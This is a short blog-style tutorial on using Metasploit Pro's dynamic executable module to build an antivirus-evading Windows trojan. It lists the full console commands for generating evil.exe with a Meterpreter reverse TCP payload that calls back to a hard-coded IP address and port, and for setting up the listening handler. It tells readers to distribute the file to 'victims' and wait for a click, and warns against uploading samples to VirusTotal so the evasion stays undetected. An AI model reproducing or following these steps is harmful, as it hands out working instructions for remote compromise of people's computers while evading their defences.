[UPDATE] AV Evasion With Metasploit Pro's Dynamic Executable Option

A while back, I posted a tutorial about basic antivirus evasion with Metasploit, but the methods I described had a very high rate of detection. I figured this was because Metasploit's payloads are so well known that AV vendors have been able to get signatures for the large majority of the payloads that have been encoded, packed, etc., rendering them virtually unusable.

Now, if your work buys you toys like mine does, it is possible that you have access to Metasploit Pro (the paid version of Metasploit). It comes with a few cool gadgets, like a web interface that allows you to manage "campaigns", as well as a few added exploits and payloads. However, we are specifically interested in one module: exploit/pro/windows/dynamic_exe

Start by firing up the MSP console:

msfpro

Then select the exploit/pro/windows/dynamic_exe module:

use exploit/pro/windows/dynamic_exe

Then set the payload you want to use. I'll use a Meterpreter reverse TCP for simplicity's sake:

set PAYLOAD windows/meterpreter/reverse_tcp

Then set the options for the dynamic executable template:

set FILENAME evil.exe
set SERVICE false

These options set the file name to evil.exe and make sure that the new executable is not a service EXE (I haven't had much luck with that).

Finally, set your standard Meterpreter options and run the module:

set LHOST 174.143.236.106
set LPORT 4443
set ExitOnSession false
exploit

Once you tell it to exploit, MSP will drop the executable under your home directory (/root/.msf4/local/evil.exe on a default Kali install).

Now that you have a file to distribute to your victims, set up a simple MSP/F listener with the same details you used when building the exe:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 174.143.236.106
set LPORT 4443
set ExitOnSession false
exploit -j

I suggest running this as a job (the -j flag), as there may be a slow turnaround before the first session comes in.

All that is left to do is to distribute that evil.exe file to your victims and wait for someone to click it. Once it is opened, you will see a standard Meterpreter session open on your listening box.

A quick note, PLEASE DO NOT SUBMIT WHATEVER PAYLOAD, EXECUTABLE, ETC YOU CREATE TO VIRUSTOTAL!